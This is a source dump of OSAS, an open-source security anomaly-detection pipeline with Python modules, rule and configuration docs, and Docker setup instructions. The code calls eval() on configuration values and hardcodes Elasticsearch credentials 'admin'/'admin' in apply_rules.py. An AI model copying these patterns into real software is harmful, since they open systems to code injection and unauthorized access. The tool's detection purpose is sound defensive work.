15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import os
20 | import sys
21 | import json
22 |
23 | sys.path.append('')
24 |
25 | # from osas.pipeline.pipeline import Pipeline
26 | from osas.core import label_generators
27 | from osas.io_utils import config
28 | from osas.core.interfaces import LabelGenerator, Datasource
29 | import configparser
30 |
31 |
32 | class GroomData():
33 | ''' class for data grooming wrapper methods '''
34 |
35 | def __init__(self, env: str = 'DEV'):
36 | # Pipeline.__init__(self, env)
37 | os.environ["OSAS_ENV"] = env
38 |
39 | def label_generator(self, name: str,
40 | load_config: str = None) -> LabelGenerator:
41 | '''generate label specified by name'''
42 | # get label generator class from name
43 | lgClass = getattr(sys.modules[label_generators.__name__], name)
44 | # get args for the label generator
45 | cfg = getattr(sys.modules[config.__name__], name)()
46 | if load_config:
47 | if isinstance(load_config, configparser.SectionProxy):
48 | cfg = load_config
49 | else:
50 | cfg.load(load_config)
51 | # get label gen obj
52 | # di = {key: eval(cfg[key]) for key in cfg}
53 | di = {}
54 | for key in cfg:
55 | try:
56 | val = eval(cfg[key])
57 | except:
58 | val = cfg[key]
59 | di[key] = val
60 | del di['generator_type']
61 | lg = lgClass(**di) # convert obj to dict to kwargs
62 | return lg
63 |
64 | def from_pretrained(self, name: str,
65 | pretrained: dict) -> LabelGenerator:
66 | '''generate label specified by name'''
67 | # get label generator class from name
68 | lgClass = getattr(sys.modules[label_generators.__name__], name)
69 | # get args for the label generator
70 | cfg = getattr(sys.modules[config.__name__], name)()
71 | return lgClass.from_pretrained(json.dumps(pretrained))
72 | # if load_config:
73 | # if isinstance(load_config, configparser.SectionProxy):
74 | # cfg = load_config
75 | # else:
76 | # cfg.load(load_config)
77 | # # get label gen obj
78 | # # di = {key: eval(cfg[key]) for key in cfg}
79 | # di = {}
80 | # for key in cfg:
81 | # try:
82 | # val = eval(cfg[key])
83 | # except:
84 | # val = cfg[key]
85 | # di[key] = val
86 | # del di['generator_type']
87 | # lg = lgClass(**di) # convert obj to dict to kwargs
88 | # return lg
89 |
90 | def build_model(self, model: LabelGenerator,
91 | dataset: Datasource, count_column: str) -> dict:
92 | return model.build_model(dataset, count_column)
93 |
94 | def get_labels(self, model: LabelGenerator,
95 | input_object: dict) -> [str]:
96 | return model.__call__(input_object)
97 |
98 | def get_pretrained_model(self, modelName: str,
99 | pretrained_data: str) -> LabelGenerator:
100 | lgClass = getattr(sys.modules[label_generators.__name__],
101 | modelName)
102 | return lgClass.from_pretrained(pretrained_data)
103 |
--------------------------------------------------------------------------------
/src/osas/templates/console.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
136 |
137 |
--------------------------------------------------------------------------------
/src/osas/api.py:
--------------------------------------------------------------------------------
1 | import configparser
2 | import sys
3 | import hashlib
4 | import io
5 | import json
6 | import time
7 |
8 | sys.path.append('')
9 |
10 | from src.osas.pipeline import Pipeline
11 | from src.osas.pipeline import DetectAnomalies
12 | from src.osas.pipeline import GroomData
13 |
14 |
15 | class OSASConfig:
16 | def __init__(self, configparser: configparser.ConfigParser):
17 | '''
18 | Create a new instance of OSAS configuration. If you don't want to manually use configparser to parse the input, use one of the helper methods: from_file or from_string
19 | @param configparser - instance of type RawConfigParser
20 | '''
21 | self._config = configparser
22 | # compute md5 of conf file
23 | bw = io.StringIO()
24 | configparser.write(bw)
25 | bw.flush()
26 | bw.seek(0)
27 | bb = bw.read().encode('utf-8')
28 | self._md5 = hashlib.md5(bb).hexdigest()
29 |
30 | @staticmethod
31 | def from_file(filename: str):
32 | '''
33 | Create a new config instance using the specified filename
34 |
35 | @param filename: path to file
36 | '''
37 |
38 | cfg = configparser.ConfigParser()
39 | with open(filename, 'r') as f:
40 | cfg.read_file(f)
41 |
42 | oc = OSASConfig(cfg)
43 | return oc
44 |
45 | @staticmethod
46 | def from_string(string: str):
47 | '''
48 | Create a new config instance using the specified configuration string
49 |
50 | @param string: configuration string
51 | '''
52 | cfg = configparser.RawConfigParser()
53 | cfg.read_string(string)
54 | oc = OSASConfig(cfg)
55 | return oc
56 |
57 | def md5(self):
58 | return self._md5
59 |
60 | @property
61 | def config(self):
62 | return self._config
63 |
64 |
65 | class OSASPretrainedModel:
66 | def __init__(self, string: str):
67 | self._json = json.loads(string)
68 | self._md5 = hashlib.md5(string.encode('utf-8')).hexdigest()
69 |
70 | @staticmethod
71 | def from_file(filename: str):
72 | return OSASPretrainedModel(open(filename).read())
73 |
74 | @staticmethod
75 | def from_string(string: str):
76 | return OSASPretrainedModel(string)
77 |
78 | def md5(self):
79 | return self._md5
80 |
81 | @property
82 | def json(self):
83 | return self._json
84 |
85 |
86 | osas_instances = {}
87 |
88 |
89 | class OSAS:
90 | def __init__(self, conf: OSASConfig, model: OSASPretrainedModel):
91 | self._pipeline = []
92 | gd = GroomData()
93 | scoring_model_name = conf.config['AnomalyScoring']['scoring_algorithm']
94 | for sect in conf.config:
95 | if 'generator_type' in conf.config[sect]:
96 | self._pipeline.append(gd.from_pretrained(conf.config[sect]['generator_type'],
97 | model.json['model'][sect]))
98 | da = DetectAnomalies()
99 | self._detect_anomalies = da.get_pretrained_model(scoring_model_name, json.dumps(model.json['scoring']))
100 |
101 | @staticmethod
102 | def get_instance(conf: OSASConfig, model: OSASPretrainedModel):
103 | total_hash = '{0}_{1}'.format(conf.md5(), model.md5())
104 | if total_hash not in osas_instances:
105 | osas_instance = OSAS(conf, model)
106 | osas_instances[total_hash] = osas_instance
107 | return osas_instance
108 | else:
109 | return osas_instances[total_hash]
110 |
111 | def __call__(self, row_dict: dict):
112 | label_list = []
113 | for lg in self._pipeline:
114 | llist = lg(row_dict)
115 | for label in llist:
116 | label_list.append(label)
117 | # create a dummy entry
118 |
119 | dummy_ds = [{'_labels': label_list}]
120 | score = self._detect_anomalies(dummy_ds, verbose=False)
121 | return {
122 | 'labels': label_list,
123 | 'score': score
124 | }
125 |
126 |
127 | if __name__ == '__main__':
128 | cfg = OSASConfig.from_file('tests/model.conf')
129 | print(cfg.md5())
130 | mdl = OSASPretrainedModel.from_file('tests/model.json')
131 | print(mdl.md5())
132 | time_start = time.time()
133 | osas = OSAS.get_instance(cfg, mdl)
134 | time_first_call = time.time()
135 | osas = OSAS.get_instance(cfg, mdl)
136 | time_second_call = time.time()
137 | t1 = time_first_call - time_start
138 | t2 = time_second_call - time_first_call
139 | print("Initial instance creation took {0:.8f} seconds".format(t1))
140 | print("Second call took {0:.8f} seconds".format(t2))
141 | print("Speedup was {0:.3f}".format(t1 / t2))
142 | print(osas({
143 | 'countries': 'Somalia',
144 | }))
145 |
--------------------------------------------------------------------------------
/docs/RULES.md:
--------------------------------------------------------------------------------
1 | # Rule-based labeling and anomaly scoring
2 |
3 | Once you have a working pipeline, you might want to refine your results by adding some human-expert knowledge on the dataset and generated labels. Using the static rules you can:
4 |
5 | * Add new labels to your dataset: for instance you want to highlight when a special user (say `system@mydatabase.com`) seems to connect from non-standard countries;
6 | * Change the anomaly score by a relative value, based on specific attribute or label(generated) values (for example, add 100 to the anomaly score when the above happens).
7 |
8 | For this, we provide another CLI tool (`osas/main/apply_rules.py`) that takes as input the previously labeled dataset and a folder that contains the static rules, while outputting the modified labels and anomaly scores into a new file:
9 |
10 | ```bash
11 | python osas/main/apply_rules.py --help
12 | Usage: apply_rules.py [options]
13 |
14 | Options:
15 | -h, --help show this help message and exit
16 | --input-file=INPUT_FILE
17 | location of the input file
18 | --rules-folder=RULES_FOLDER
19 | location of rules
20 | --output-file=OUTPUT_FILE
21 | output-file (optional)
22 | --no-elastic don't push data to Elastic
23 | ```
24 |
25 | **Parameters**
26 | * `--input-file`: path to a CSV file, **already processed** by `run_pipeline.py`
27 | * `--rules-folder`: path to a system folder containing the static rules in `.yaml` format
28 | * `--output-file`: where to store the results
29 | * `--no-elastic`: don't push data back to elastic (useful when OSAS is run outside the distributed Docker image)
30 |
31 | **Note:** OSAS will apply all the rules inside the folder.
32 |
33 | ## The format of rule files
34 |
35 | If you are an impatient reader, you can skip this section and go straight to the example. Everything inside the rule files is self-explanatory and the practical example will probably clarify everything else.
36 |
37 | Rules are stored in `YAML` format and must saved in files that have the `.yaml` extension.
38 | Each rule must contain the following mandatory attributes:
39 |
40 | * `rule name`: each rule must have a name (not necessarily unique)
41 | * `rule label`: what label you want to add if this specific rule is a match for one of the examples in your dataset
42 | * `rule score`: this is a floating point value, that will modify the original anomaly scoring.
43 | * `conditions`: this should indicate a list of conditions that will be the trigger for this rule. The boolean operation between them is `OR`
44 |
45 | Each condition has a free-form `label` (key) that is not used anywhere else, except for making the file readable to those who edit it. Then it is followed by a list of attribute names (columns in the CSV) with their possible value/values. The logical operation between attribute matches is `AND` and the logical operator between values is `OR`
46 | Also, the attribute values are regular expression, to allow for wild-cards.
47 |
48 | ## Example
49 |
50 | Say you have a dataset that contains user logins with origin country, ip address (`host`) and timestamp. Also, your infrastructure has some automation that works by connecting to the server from a host with a known IP address (`10.10.10.10`) and user (`privileged@system`).
51 | Additionally, you used the Knowledge based label generator to create a special label to reflect the time of day: `EARLY_MORNING`, `EVENING`, `NIGHT`, and you know that the automation should only run at night.
52 |
53 | This is how a rule would look like:
54 |
55 | ```yaml
56 | rule name: privileged login from unknown ip or outside normal hours
57 | rule label: DANGER_FOR_AUTOMATION_ACCOUNT
58 | rule score: +500
59 | conditions:
60 | privileged_unkown_ip:
61 | host: ^((?!10.10.10.10).)*$
62 | username: privileged@system
63 | automation_outside_normal_hours:
64 | labels:
65 | - EARLY_MORNING
66 | - EVENING
67 | username: privileged@system
68 | ```
69 |
70 | Short explanation:
71 | 1. The rule name is `privileged login from unknown ip or outside normal hours`, indicating clearly what it does;
72 | 2. The label `DANGER_FOR_AUTOMATION_ACCOUNT` will get added to every example that matches this rule;
73 | 3. Every time the rule is matched, the anomaly score will get increased by 500;
74 | 4. The rule has two conditions that can be matched independently: `privileged_unkown_ip` and `automation_outside_normal_hours`. If either one of these conditions match, the rule will get executed;
75 | 5. Rule 1 (`privileged_unkown_ip`) - looks at the username and expects it to be `privileged@system`. Also, it wants the `host` value to be anything else than `10.10.10.10`
76 | 6. Rule 2 (`automation_outside_normal_hours`) - also looks at the username and expects it to be `privileged@system`. Additionally, it checks the labels for any of the two values specified in the list: `EARLY_MORNING` and `EVENING`
77 |
78 | We hope that this explains the way rules are applied and how you can build the boolean login around them.
79 |
80 | ## Tips and tricks
81 |
82 | **Tip 1:** The `rule score`, is a modifier that can be positive or negative. Use positive values to highlight alerts, negative values to whitelist events and 0 if you just want the rule-label added;
83 |
84 | **Tip 2:** If the attribute name is `labels` than the condition will apply on the labels that OSAS added in the `run_pipeline.py` step;
85 |
86 |
87 |
--------------------------------------------------------------------------------
/src/osas/io_utils/config.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import sys
20 | import ast
21 | from builtins import object, super
22 | import collections
23 | import configparser
24 | import pandas as pd
25 | from dataclasses import dataclass, field
26 |
27 |
28 | @dataclass
29 | class Config(object):
30 | '''Generic base class to load/save config'''
31 |
32 | def _eval_str(self, s):
33 | '''convert type to actual type'''
34 | try:
35 | return ast.literal_eval(s)
36 | except:
37 | return s
38 |
39 | def save(self, filename):
40 | """Save configuration to file."""
41 | self.__config__ = self.__class__.__name__
42 | sorted_dict = collections.OrderedDict(sorted(self.__dict__.items()))
43 | # sort dictionary
44 | config = configparser.ConfigParser()
45 | config.add_section(self.__config__) # write header
46 | for k, v in sorted_dict.items(): # for python3 use .items()
47 | if not k.startswith("_"): # write only non-private properties
48 | if isinstance(v, float): # if we are dealing with a float
49 | str_v = str(v)
50 | if "e" not in str_v and "." not in str_v:
51 | # stopconfusion with an int by appending a ".0"
52 | v = str_v + ".0"
53 | v = str(v)
54 | config.set(self.__config__, k, v)
55 | with fopen(filename, 'w') as cfgfile:
56 | config.write(cfgfile)
57 |
58 | def load(self, filename):
59 | '''Load configuration from file'''
60 | __config__ = self.__class__.__name__
61 | config = configparser.ConfigParser()
62 | config.read(filename)
63 | # check to see if the config file has the appropriate section
64 | if not config.has_section(__config__):
65 | sys.stderr.write("ERROR: File:{} is not a valid configuration file"
66 | " for the selected task: Missing section:[{}]\n"
67 | .format(filename, __config__))
68 | sys.exit(1)
69 | for k, v in config.items(__config__):
70 | self.__dict__[k] = self._eval_str(v)
71 |
72 |
73 | # ****Beware****
74 | # Don't save secrets as default config
75 | # Use local config file (not git synced) to save secrets
76 |
77 |
78 | # ML data dataclasses
79 | @dataclass
80 | class CSVDataSource(Config):
81 | filename: str = field(default='corpus/test.csv')
82 |
83 |
84 | @dataclass
85 | class CSVDataColumn(Config):
86 | data: pd.DataFrame = field(default=pd.DataFrame())
87 |
88 |
89 | # Label Generator dataclasses
90 | @dataclass
91 | class ObfuscationField(Config):
92 | field_name: str = field(default='command')
93 | gpu: bool = field(default=False)
94 |
95 |
96 | @dataclass
97 | class NumericField(Config):
98 | field_name: str = field(default='count')
99 | group_by: str = field(default=None)
100 | mode: str = field(default='stdev')
101 | borderline_threshold: float = field(default=1)
102 | outlier_threshold: float = field(default=2)
103 | label_for_normal: bool = field(default=True)
104 |
105 |
106 | @dataclass
107 | class TextField(Config):
108 | field_name: str = field(default='command')
109 | lm_mode: str = field(default='char')
110 | ngram_range: tuple = field(default=(3, 5))
111 |
112 |
113 | @dataclass
114 | class MultinomialField(Config):
115 | field_name: str = field(default='user')
116 | absolute_threshold: int = field(default=10)
117 | relative_threshold: float = field(default=0.1)
118 | group_by: str = field(default=None)
119 |
120 |
121 | @dataclass
122 | class LOLField(Config):
123 | field_name: str = field(default='command')
124 | platform: str = field(default='linux')
125 |
126 |
127 | @dataclass
128 | class NumericalFieldCombiner(Config):
129 | field_names: list = field(default_factory=lambda: [])
130 | normalize: bool = field(default=True)
131 |
132 |
133 | @dataclass
134 | class MultinomialFieldCombiner(Config):
135 | field_names: list = field(default_factory=lambda: [])
136 | absolute_threshold: float = field(default=500)
137 | relative_threshold: float = field(default=0.005)
138 | group_by: str = field(default=None)
139 |
140 |
141 | @dataclass
142 | class KeywordBased(Config):
143 | keyword_list: list = field(default_factory=lambda: [])
144 | field_name: str = field(default='count')
145 |
146 |
147 | @dataclass
148 | class KnowledgeBased(Config):
149 | rules_and_labels_tuple_list: list = field(default_factory=lambda: [()])
150 | field_name: str = field(default='')
151 |
152 | # mfc = MultinomialFieldCombiner()
153 | # mfc.load('osas/etc/ad_config.conf')
154 | # print(vars(mfc))
155 |
--------------------------------------------------------------------------------
/src/osas/main/apply_rules.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2022 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import optparse
20 | import re
21 | import sys
22 |
23 | import tqdm
24 | from elasticsearch import helpers, Elasticsearch
25 |
26 | sys.path.append('')
27 |
28 | from osas.data.datasources import CSVDataSource, Datasource
29 | import yaml
30 | import os
31 |
32 |
33 | def is_numeric(obj):
34 | attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
35 | return all(hasattr(obj, attr) for attr in attrs)
36 |
37 |
38 | def _get_all_yaml_files(root: str):
39 | all_files = []
40 | for path, subdirs, files in os.walk(root):
41 | for name in files:
42 | if name.endswith('.yaml'):
43 | all_files.append(os.path.join(path, name))
44 | return all_files
45 |
46 |
47 | def _load_rules(rules_folder: str) -> dict:
48 | all_rule_files = _get_all_yaml_files(rules_folder)
49 | all_rules = []
50 | for file in all_rule_files:
51 | with open(file, 'r') as f:
52 | rules_pack = yaml.safe_load(f)
53 | if rules_pack is None:
54 | continue
55 | if 'rule name' not in rules_pack:
56 | sys.stdout.write('Invalid rule file {0}. Missing rule name\n'.format(file))
57 | sys.exit(0)
58 | if 'rule label' not in rules_pack:
59 | sys.stdout.write('Invalid rule file {0}. Missing rule label\n'.format(file))
60 | sys.exit(0)
61 | if 'rule score' not in rules_pack:
62 | sys.stdout.write('Invalid rule file {0}. Missing rule score\n'.format(file))
63 | sys.exit(0)
64 | all_rules.append(rules_pack)
65 | return all_rules
66 |
67 |
68 | def _apply_rules(datasource: Datasource, rules: dict):
69 | scores = datasource['score']
70 | labels = datasource['labels']
71 | index = 0
72 | regex_cache = {}
73 | for item in tqdm.tqdm(datasource):
74 | for rule in rules:
75 | rule_name = rule['rule name']
76 | rule_score = float(rule['rule score'])
77 | rule_label = rule['rule label']
78 | cases = rule['conditions']
79 | for case in cases:
80 | valid = True
81 | for attribute_name in cases[case]:
82 | attribute_values = cases[case][attribute_name]
83 | if not isinstance(attribute_values, list):
84 | attribute_values = [attribute_values]
85 | if attribute_name not in item:
86 | sys.stdout.write('Your dataset does not contain "{0}"\n'.format(attribute_name))
87 | sys.exit(0)
88 | found = False
89 | for attribute_value in attribute_values:
90 | if attribute_value not in regex_cache:
91 | regex_cache[attribute_value] = re.compile(attribute_value)
92 | compiled_regex=regex_cache[attribute_value]
93 | if compiled_regex.match(item[attribute_name]):
94 | found = True
95 | break
96 | if not found:
97 | valid = False
98 | break
99 | if valid:
100 | scores[index] += rule_score
101 | if len(labels[index]) > 3:
102 | labels[index] = labels[index][:-1] + ', \'' + rule_label + '\']'
103 | else:
104 | labels[index] = '[\'{0}\']'.format(rule_label)
105 | index += 1
106 |
107 | datasource['_labels'] = labels
108 |
109 |
110 | def process(params):
111 | # load and run pipeline
112 | rules_pack = _load_rules(params.rules_folder)
113 | datasource = CSVDataSource(params.input_file)
114 | _apply_rules(datasource, rules_pack)
115 |
116 | # save, if necessary
117 | if params.output_file:
118 | datasource.save(open(params.output_file, 'w'))
119 | # push to elasticsearch
120 | if not params.no_elastic:
121 | try:
122 | es = Elasticsearch([{'host': 'localhost', 'port': 9200}], http_auth=('admin', 'admin'))
123 | data = [item for item in datasource]
124 | helpers.bulk(es, data, index="anomalies", doc_type="type")
125 | except Exception as e:
126 | sys.stdout.write('Unable to push data to ElasticSearch: {0}\n'.format(str(e)))
127 |
128 |
129 | if __name__ == '__main__':
130 | parser = optparse.OptionParser()
131 | parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
132 | parser.add_option('--rules-folder', action='store', dest='rules_folder', help='location of rules')
133 | parser.add_option('--output-file', action='store', dest='output_file', help='output-file (optional)')
134 | parser.add_option('--no-elastic', action='store_true', dest='no_elastic', help='don\'t push data to Elastic')
135 | (params, _) = parser.parse_args(sys.argv)
136 |
137 | if params.input_file and params.rules_folder:
138 | if params.no_elastic and not params.output_file:
139 | sys.stdout.write("This run will not produce any results. You need to either specify --output-file or "
140 | "remove --no-elastic\n")
141 | else:
142 | process(params)
143 | else:
144 | parser.print_help()
145 |
--------------------------------------------------------------------------------
/src/osas/core/interfaces.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | from typing import Union, Any
20 | from abc import abstractmethod
21 |
22 |
23 | class DatasourceIterator:
24 | def __init__(self, datasource):
25 | self._ds = datasource
26 | self._index = 0
27 |
28 | def __next__(self):
29 | if self._index < len(self._ds):
30 | rez = self._ds[self._index]
31 | self._index += 1
32 | return rez
33 | else:
34 | raise StopIteration
35 |
36 |
37 | class DataColumn:
38 | def __init__(self):
39 | pass
40 |
41 | @abstractmethod
42 | def mean(self) -> float:
43 | """Computes mean for numerical columns"""
44 | pass
45 |
46 | @abstractmethod
47 | def std(self) -> float:
48 | """Computes standard deviation for numerical columns"""
49 | pass
50 |
51 | @abstractmethod
52 | def min(self) -> any:
53 | """Computes minumum value for numerical columns"""
54 | pass
55 |
56 | @abstractmethod
57 | def max(self) -> any:
58 | """Computes minumum value for numerical columns"""
59 | pass
60 |
61 | @abstractmethod
62 | def unique(self) -> list:
63 | """Computes unique values for columns"""
64 | pass
65 |
66 | @abstractmethod
67 | def value_counts(self) -> dict:
68 | """Computes histogram values for columns"""
69 | pass
70 |
71 | @abstractmethod
72 | def tolist(self) -> list:
73 | """Computes """
74 | pass
75 |
76 | @abstractmethod
77 | def apply(self, func) -> int:
78 | """
79 | Apply lambda function
80 | :param func: function to apply
81 | :return:
82 | """
83 | pass
84 |
85 | @abstractmethod
86 | def __len__(self) -> int:
87 | """Returns the number of items in the collection"""
88 | pass
89 |
90 | @abstractmethod
91 | def __getitem__(self, index: int) -> dict:
92 | """Returns an item as a dictionary
93 | :param index - the index of the element
94 | """
95 | pass
96 |
97 | @abstractmethod
98 | def __setitem__(self, index: int, value: Any) -> dict:
99 | """Sets the value for an item
100 | :param index - the index of the element
101 | """
102 | pass
103 |
104 | def __iter__(self):
105 | return DatasourceIterator(self)
106 |
107 |
108 | class Datasource:
109 | def __init__(self):
110 | pass
111 |
112 | @abstractmethod
113 | def __len__(self) -> int:
114 | """Returns the number of items in the collection"""
115 | pass
116 |
117 | @abstractmethod
118 | def __getitem__(self, index: int) -> dict:
119 | """Returns an item as a dictionary
120 | :param index - the index of the element
121 | """
122 | pass
123 |
124 | @abstractmethod
125 | def __setitem__(self, key: str, value: any):
126 | """
127 | Create or set a column
128 | :param key: column name
129 | :param value: values
130 | :return:
131 | """
132 | pass
133 |
134 | def __iter__(self):
135 | return DatasourceIterator(self)
136 |
137 | @abstractmethod
138 | def apply(self, func, axis: int = 0) -> int:
139 | """
140 | Apply lambda function
141 | :param func: function to apply
142 | :param axis: 0-column, 1-row; default=0
143 | :return:
144 | """
145 | pass
146 |
147 | @abstractmethod
148 | def save(self, file_handle) -> None:
149 | """
150 | Save the data into csv format
151 | :param file_handle: open file handle for writing
152 | :return: None
153 | """
154 |
155 |
156 | class LabelGenerator:
157 | def __init__(self):
158 | pass
159 |
160 | @abstractmethod
161 | def __call__(self, input_object: dict) -> [str]:
162 | """
163 | Generate specific labels for the dataset entry
164 | :param input_object: an entry in the dataset
165 | :return: list of labels generated for this input object
166 | """
167 | pass
168 |
169 | @abstractmethod
170 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
171 | """
172 | This model should generate a model on the input
173 | :param dataset: the dataset used to generate the model
174 | :param count_column: use this column for clustered data. If not set, event count will be 1
175 | :return: This should be a json serializable object
176 | """
177 | pass
178 |
179 | @staticmethod
180 | def from_pretrained(pretrained: str) -> object:
181 | """
182 | :param pretrained: dictionary holding pretrained model
183 | :return: New instance
184 | """
185 | pass
186 |
187 |
188 | class AnomalyDetection:
189 | def __init__(self):
190 | pass
191 |
192 | @abstractmethod
193 | def build_model(self, dataset: Datasource, incremental: bool = False) -> dict:
194 | """
195 | This model should generate a model on the input
196 | :param dataset: the dataset used to generate the model
197 | :param incremental: perform incremental update
198 | :return: This should be a json serializable object
199 | """
200 | pass
201 |
202 | @abstractmethod
203 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
204 | """
205 | Scores a dataset with anomaly scores
206 | :param dataset: the dataset to score
207 | :return: an anomaly score for each example in the dataset
208 | """
209 | pass
210 |
--------------------------------------------------------------------------------
/docs/PIPELINE_CONFIGURATION.md:
--------------------------------------------------------------------------------
1 | # Pipeline explained
2 |
3 | The pipeline sequentially applies all label generators on the raw data, collects the labels and uses an anomaly scoring algorithm to generate anomaly scores.
4 | There are two main component classes: LabelGenerator and ScoringAlgorithm.
5 |
6 | ## Label generators
7 |
8 | **NumericField**
9 |
10 | * This type of LabelGenerator handles numerical fields. It can compute in two different ways: (1) the mean and standard deviation and generates labels
11 | according to the distance between the current value and the mean value (value<=sigma NORMAL, sigma:/app osas
34 | ```
35 |
36 | **IMPORTANT NOTE:** Please modify the above command by adding the absolute path to your datafolder in the appropiate location
37 |
38 | After OSAS has started (it might take 1-2 minutes) you can use your browser to access some standard endpoints:
39 | * [http://localhost:5601/app/home#/](http://localhost:5601/app/home#/) - access to Kibana frontend (this is where you will see your data)
40 | * [http://localhost:8888/?token=osas](http://localhost:8888/?token=osas) - access to Jupyter Lab (open Terminal or create a Notebook)
41 |
42 | For Debug (in case you need to):
43 |
44 | ```shell
45 | docker run -p 8888:8888/tcp -p 5601:5601/tcp -v :/app -ti osas /bin/bash
46 | ```
47 |
48 | ## Building the test pipeline
49 |
50 | This guide will take you through all the necessary steps to configure, train and run your own pipeline on your own dataset.
51 |
52 | **Prerequisite**: Add you own CSV dataset into your data-folder (the one provided in the `docker run` command)
53 |
54 | Once you started your docker image, use the [OSAS console](http://localhost:8888/osas/console) to gain CLI access to all the tools.
55 |
56 | In what follows, we assume that your dataset is called `dataset.csv`. Please update the commands as necessary in case you use a different name/location.
57 |
58 | **Be sure you are running scripts in the root folder of OSAS:**
59 |
60 | ```bash
61 | cd /osas
62 | ```
63 | **Step 1:** Build a custom pipeline configuration file - this can be done fully manually on by bootstraping using our conf autogenerator script:
64 | ```bash
65 | python3 osas/main/autoconfig.py --input-file=/app/dataset.csv --output-file=/app/dataset.conf
66 | ```
67 |
68 | The above command will generate a custom configuration file for your dataset. It will try guess field types and optimal combinations between fields. You can edit the generated file (which should be available in the shared data-folder), using your favourite editor.
69 |
70 | Standard templates for label generator types are:
71 |
72 | ```editorconfig
73 | [LG_MULTINOMIAL]
74 | generator_type = MultinomialField
75 | field_name =
76 | absolute_threshold = 10
77 | relative_threshold = 0.1
78 | group_by = None # this is an optional field - it can be a single attribute name or a list of names
79 |
80 | [LG_TEXT]
81 | generator_type = TextField
82 | field_name =
83 | lm_mode = char
84 | ngram_range = (3, 5)
85 |
86 | [LG_NUMERIC]
87 | generator_type = NumericField
88 | field_name =
89 | group_by = None # this is an optional field - it can be a single attribute name or a list of names
90 |
91 | [LG_MUTLINOMIAL_COMBINER]
92 | generator_type = MultinomialFieldCombiner
93 | field_names = ['', '', ...]
94 | absolute_threshold = 10
95 | relative_threshold = 0.1
96 | group_by = None # this is an optional field - it can be a single attribute name or a list of names
97 |
98 | [LG_KEYWORD]
99 | generator_type = KeywordBased
100 | field_name =
101 | keyword_list = ['', '', '', ...]
102 |
103 | [LG_REGEX]
104 | generator_type = KnowledgeBased
105 | field_name =
106 | rules_and_labels_tuple_list = [('',''), ('',''), ...]
107 | ```
108 |
109 | You can use the above templates to add as many label generators you want. Just make sure that the header IDs are unique in the configuration file.
110 |
111 | **Step 2:** Train the pipeline
112 |
113 | ```bash
114 | python3 osas/main/train_pipeline.py --conf-file=/app/dataset.conf --input-file=/app/dataset.csv --model-file=/app/dataset.json
115 | ```
116 |
117 | The above command will generate a pretrained pipeline using the previously created configuration file and the dataset
118 |
119 | **Step 3:** Run the pipeline on a dataset
120 |
121 | ```bash
122 | python3 osas/main/run_pipeline.py --conf-file=/app/dataset.conf --model-file=/app/dataset.json --input-file=/app/dataset.csv --output-file=/app/dataset-out.csv
123 | ```
124 |
125 | The above command will run the pretrained pipeline on any compatible dataset. In the example we run the pipeline on the training data, but you can use previously unseen data. It will generate an output file with labels and anomaly scores and it will also import your data into Elasticsearch/Kibana. To view the result just use the the [web interface](http://localhost:5601/app/dashboards).
126 |
127 | # Developing models
128 |
129 | Now that everything is up and running, we prepared a set of development guidelines that will help you apply OSAS on your own dataset:
130 |
131 | 1. [Pipeline configuration](docs/PIPELINE_CONFIGURATION.md): This will help you understand how the label generators and anomaly scoring works in OSAS;
132 | 2. [Rule-based score modifiers and labeling](docs/RULES.md): Once you have a working OSAS pipeline, you can furhter refine your results by adding new labels and modifying the anomaly scoring based on static rules.
133 |
134 | # Citing and attribution
135 |
136 | **Full-text-paper: [A Principled Approach to Enriching Security-related Data for Running Processes through Statistics and Natural Language Processing](https://www.scitepress.org/Papers/2021/103814/103814.pdf).**
137 |
138 | If you want to use this repository in any academic work, please cite the following work:
139 |
140 | **MLA**
141 | * Boros, Tiberiu, et al. ‘A Principled Approach to Enriching Security-Related Data for Running Processes through Statistics and Natural Language Processing’. IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security, 2021.
142 |
143 | **APA**
144 | * Boros, T., Cotaie, A., Vikramjeet, K., Malik, V., Park, L., & Pachis, N. (2021). A principled approach to enriching security-related data for running processes through statistics and natural language processing. IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security.
145 |
146 | **Chicago**
